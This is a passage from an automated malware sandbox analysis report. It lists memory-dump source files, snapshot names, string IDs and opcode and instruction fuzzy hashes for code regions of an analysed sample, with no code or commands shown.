                • Instruction Fuzzy Hash: 1B21D470B0522E8BEB68DF90D8A47FDB7B1AF54311F05457AD40EAB2A0CB785A84CB00
                Strings
                Memory Dump Source
                • Source File: 00000022.00000002.1888476644.00007FFD9BABA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABA000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_34_2_7ffd9baba000_mmeUVmNHPOdst.jbxd
                Similarity
                • API ID:
                • String ID: '$<$H$[$\
                • API String ID: 0-978586023
                • Opcode ID: 70811a1f5260896d409af6c46a8f5f8b3ad5adb04a426629b3f03a87309b0cde
                • Instruction ID: 2c0c74aa8cfa6457fad5c9bf4aaa1c9b6aac33a6f618f9d3f2f54fe1d4220a7b
                • Opcode Fuzzy Hash: 70811a1f5260896d409af6c46a8f5f8b3ad5adb04a426629b3f03a87309b0cde
                • Instruction Fuzzy Hash: AC21F970E0926ECFDBA8DF50D8607A9B7B1BB55301F1145BEC41AA6290CB786E84CF40
                Strings
                Memory Dump Source
                • Source File: 00000022.00000002.1888476644.00007FFD9BABA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABA000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_34_2_7ffd9baba000_mmeUVmNHPOdst.jbxd
                Similarity
                • API ID:
                • String ID: $=$I$^
                • API String ID: 0-3128807046
                • Opcode ID: f82c77b2feb001e49c4c038ad54664dcba24dc9fbadd0db70e896da7f47f4698
                • Instruction ID: c51a239b13dae317ecfa199662a4714d8e5cb814eb303b59dbde7ec18ac190b6
                • Opcode Fuzzy Hash: f82c77b2feb001e49c4c038ad54664dcba24dc9fbadd0db70e896da7f47f4698
                • Instruction Fuzzy Hash: 3151A570E0962D8FDBA8DF54C8A57A9B7B1FB55301F1141EED41EA22A1CB746E81CF40
                Strings
                Memory Dump Source
                • Source File: 00000022.00000002.1888476644.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_34_2_7ffd9bac1000_mmeUVmNHPOdst.jbxd
                Similarity
                • API ID:
                • String ID: %$-$/${
                • API String ID: 0-2415596918
                • Opcode ID: 8e0d11e9fb33994c6314699794577981ec387bfd80d1aea026ea80901737cd49
                • Instruction ID: 86a7fa18661d39867947a6f7e0350b4c4bff36355f3369b1c3523895de53052b
                • Opcode Fuzzy Hash: 8e0d11e9fb33994c6314699794577981ec387bfd80d1aea026ea80901737cd49
                • Instruction Fuzzy Hash: E421D270F0522E8BEB68DF91D8A47FDB7B2AB54311F01456AD40EAB290CB785A84DF00